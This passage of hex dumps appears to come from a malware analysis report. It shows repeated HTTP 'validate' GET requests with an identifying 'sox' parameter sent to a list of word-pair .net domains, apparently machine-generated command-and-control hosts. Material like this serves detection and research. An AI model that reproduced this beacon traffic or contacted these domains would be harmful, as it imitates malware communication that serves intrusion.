2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206d6f 75746877 6f72642e 6e65740d : mouthword.net. 0x00000080 (00128) 0a0d0a0a 0d0a740d 2015be01 ......t. ... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206c69 6665636c 6f636b2e 6e65740d : lifeclock.net. 0x00000080 (00128) 0a0d0a0a 0d0a740d 2015be01 ......t. ... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207265 636f7264 736f6c64 6965722e : recordsoldier. 0x00000080 (00128) 6e65740d 0a0d0a0d 2015be01 net..... ... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a20666c 69657273 75727072 6973652e : fliersurprise. 0x00000080 (00128) 6e65740d 0a0d0a0d 2015be01 net..... ... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206869 73746f72 79627269 6768742e : historybright. 0x00000080 (00128) 6e65740d 0a0d0a0d 2015be01 net..... ... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206368 69656673 6f6c6469 65722e6e : chiefsoldier.n 0x00000080 (00128) 65740d0a 0d0a0a0d 2015be01 et...... ... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a20636c 61737373 75727072 6973652e : classsurprise. 0x00000080 (00128) 6e65740d 0a0d0a0d 2015be01 net..... ... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207468 6f736563 6f6e7469 6e75652e : thosecontinue. 0x00000080 (00128) 6e65740d 0a0d0a0d 2015be01 net..... ... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a207468 726f7567 68636f6e 7461696e : throughcontain 0x00000080 (00128) 2e6e6574 0d0a0d0a 2015be01 .net.... ... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206265 6c6f6e67 67756172 642e6e65 : belongguard.ne 0x00000080 (00128) 740d0a0d 0a0a0d0a 2015be01 t....... ... 0x00000000 (00000) 47455420 2f696e64 65782e70 68703f6d GET /index.php?m 0x00000010 (00016) 6574686f 643d7661 6c696461 7465266d ethod=validate&m 0x00000020 (00032) 6f64653d 736f7826 763d3035 3026736f ode=sox&v=050&so 0x00000030 (00048) 783d3466 61653061 3030266c 656e6864 x=4fae0a00&lenhd 0x00000040 (00064) 72204854 54502f31 2e300d0a 41636365 r HTTP/1.0..Acce 0x00000050 (00080) 70743a20 2a2f2a0d 0a436f6e 6e656374 pt: */*..Connect 0x00000060 (00096) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000070 (00112) 3a206d61 7962656c 6c696e65 74686164 : maybellinethad 0x00000080 (00128) 64657573 2e6e6574 0d0a0d0a deus.net....
Strings